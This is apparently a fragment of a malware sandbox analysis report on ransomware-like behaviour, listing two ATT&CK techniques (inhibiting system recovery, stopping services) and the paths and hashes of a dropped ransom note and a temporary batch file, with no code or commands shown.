Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT

Filesize
922B

MD5
6fa42be5e99f714ae3efe70db3ad340d

SHA1
49f045ffc35a666ca4339fd1b7407909f5131130

SHA256
5fe79f12ae2f96a65414d1cdd1c70f3e3eb7eff3de173e3c60a1c5e67fb2de3f

SHA512
e87e8959b41a224e12dc7693ebef4821007b6ff285d10ca6ac09c6ecadccf74d5212aab5a7acf93c27af64f70616b79bd3484623bf5eab66d6d43a25a5bd321d

Download Submit
\??\c:\windows\temp\bweokw.bat

Filesize
11KB

MD5
9ef680eda0e357dfcdfe9a7ddcd33514

SHA1
33a5a77eb9bb3be27b37fb8645fbe946b3f5f4ed

SHA256
dc98394f1189fd8ae45eec6e7302993b0cc2da4ab8855503ca6d76ed59b17692

SHA512
e3b3e595d760c13d5509ca8e621dc8bec36d705199effcc60b1c854d0f6ce17bc1eab26ea5704dba1d34a4e35c401cf22917deb088fce1e32403878ebc690293

Download Submit